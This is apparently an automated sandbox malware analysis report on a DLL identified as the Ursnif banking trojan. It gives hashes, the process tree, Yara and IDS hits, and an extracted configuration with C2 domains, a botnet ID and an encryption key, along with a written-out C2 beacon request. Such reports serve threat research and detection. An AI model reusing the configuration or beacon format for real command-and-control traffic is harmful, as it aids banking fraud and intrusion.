Play interactive tour

Edit tour

Windows Analysis Report c36.dll

Overview

General Information

Sample Name:	c36.dll
Analysis ID:	446420
MD5:	c36ab737db2b6d11fb1f443f8117a7fa
SHA1:	e6fab2798dd6088aa3527a01ae1b3f2415cf40cf
SHA256:	181fe6714ebaff8c1855e8e1dbac545ffd160df0ec96ddf920c5155916b7111b
Tags:	dllgozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4796 cmdline: loaddll32.exe 'C:\Users\user\Desktop\c36.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 1636 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 1844 cmdline: rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1488 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1632 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Division MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5520 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2616 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5468 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 3008 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 4796	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 1844	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000003.310307247.0000000001130000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Source: c36.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdby1Zs# source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: c:\Door\26\Enter\Mos\Hard \Stretch.pdb source: loaddll32.exe, 00000002.00000002.484014411.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.487526023.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.386861374.000000006E1EB000.00000002.00020000.sdmp, c36.dll
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbT? source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdbG1xs( source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdbK1dsg& source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbgB source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49729 -> 40.97.128.194:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49729 -> 40.97.128.194:80

Source: Joe Sandbox View

IP Address: 40.97.128.194 40.97.128.194

Source: global traffic

HTTP traffic detected: GET /jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive

Source: msapplication.xml0.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: outlook.com

Source: msapplication.xml.24.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.24.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.24.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.24.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.24.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.24.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.24.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.24.dr	String found in binary or memory: http://www.youtube.com/
Source: {6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat.24.dr	String found in binary or memory: https://outlook.office365.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1A1996 GetProcAddress,NtCreateSection,memset,	2_2_6E1A1996
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1A1A44 NtMapViewOfSection,	2_2_6E1A1A44
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1A23A5 NtQueryVirtualMemory,	2_2_6E1A23A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_02EA5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_02EA5A27
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_02EAB1A5 NtQueryVirtualMemory,	2_2_02EAB1A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01185A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_01185A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0118B1A5 NtQueryVirtualMemory,	5_2_0118B1A5

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1A2184	2_2_6E1A2184
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_02EA3EE1	2_2_02EA3EE1
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_02EA888E	2_2_02EA888E
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_02EAAF80	2_2_02EAAF80
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1CA260	2_2_6E1CA260
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1CD1F0	2_2_6E1CD1F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1E8559	2_2_6E1E8559
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1DEDC4	2_2_6E1DEDC4
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1DC5EB	2_2_6E1DC5EB
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1CDA30	2_2_6E1CDA30
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1E7AD1	2_2_6E1E7AD1
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1E8015	2_2_6E1E8015
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1D68E0	2_2_6E1D68E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1EA1BF	2_2_6E1EA1BF
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1C99A0	2_2_6E1C99A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0118AF80	5_2_0118AF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0118888E	5_2_0118888E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01183EE1	5_2_01183EE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1CA260	5_2_6E1CA260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1CD1F0	5_2_6E1CD1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1E8559	5_2_6E1E8559
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1DEDC4	5_2_6E1DEDC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1DC5EB	5_2_6E1DC5EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1CDA30	5_2_6E1CDA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1E7AD1	5_2_6E1E7AD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1E8015	5_2_6E1E8015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1D68E0	5_2_6E1D68E0
